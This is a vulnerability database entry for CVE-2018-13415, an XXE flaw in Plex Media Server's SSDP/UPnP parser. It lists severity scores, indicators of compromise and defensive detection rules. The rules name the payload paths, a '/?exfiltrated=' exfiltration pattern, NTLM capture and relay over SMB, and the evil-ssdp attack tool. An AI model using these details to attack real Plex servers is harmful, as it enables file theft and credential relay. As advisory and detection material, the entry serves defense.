cbcvebase.
CVE-2018-13415
published 2018-08-13

CVE-2018-13415: In Plex Media Server 1.13.2.5154, the XML parsing engine for SSDP/UPnP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Remote…

PriorityP276critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
31.81%
98.1th percentile
In Plex Media Server 1.13.2.5154, the XML parsing engine for SSDP/UPnP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Remote, unauthenticated attackers can use this vulnerability to: (1) Access arbitrary files from the filesystem with the same permission as the user account running Plex, (2) Initiate SMB connections to capture a NetNTLM challenge/response and crack to cleartext password, or (3) Initiate SMB connections to relay a NetNTLM challenge/response and achieve Remote Command Execution in Windows domains.

Affected

1 ranges
VendorProductVersion rangeFixed in
plexmedia_server

Detection & IOCsextracted from sources · hover to see the quote

urlhttps://gitlab.com/initstring/evil-ssdp
port1900/udp
ip239.255.255.250
path/ssdp/device-desc.xml
path/ssdp/data.dtd
port445/tcp
uaDVBLink
versionPlex Media Server 1.13.2.5154
  • Monitor for outbound SMB connections (port 445) originating from the Plex Media Server process — this is anomalous and indicates XXE-triggered NTLM relay/capture activity.
  • Detect HTTP GET requests to paths matching /ssdp/device-desc.xml and /ssdp/data.dtd on attacker-controlled servers; these are the XXE payload delivery paths used in exploitation.
  • Alert on HTTP GET requests containing the pattern /?exfiltrated= in the URI, which indicates successful out-of-band XXE file exfiltration from Plex.
  • Monitor SSDP traffic (UDP 239.255.255.250:1900) for M-SEARCH responses that include a Device Descriptor URL pointing to an external or non-local host, which is the initial XXE trigger vector.
  • Inspect XML content fetched by Plex over HTTP for DOCTYPE declarations containing ENTITY tags referencing SMB (file://) or HTTP URIs — presence of these in SSDP device descriptors is the XXE payload signature.
  • Look for the [XXE VULN!!!!] log pattern or equivalent: a User-Agent of 'None' making requests to /ssdp/device-desc.xml, which is the fingerprint of Plex's libxml2 XXE callback.
  • ·The attack is limited to attackers on the same LAN as the Plex server, as it requires responding to SSDP UDP multicast traffic on the local network segment.
  • ·File exfiltration via XXE (POC 2) is limited to single-line files with no whitespace; multi-line or whitespace-containing files cannot be reliably exfiltrated with this technique.
  • ·The vulnerability is exploited automatically upon Plex restart — no user interaction beyond restarting the service is required, making it a zero-click attack on the LAN.
  • ·The XXE is processed by libxml2 within Plex's SSDP/UPnP component; the affected component and library should be the focus of patching and version tracking.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.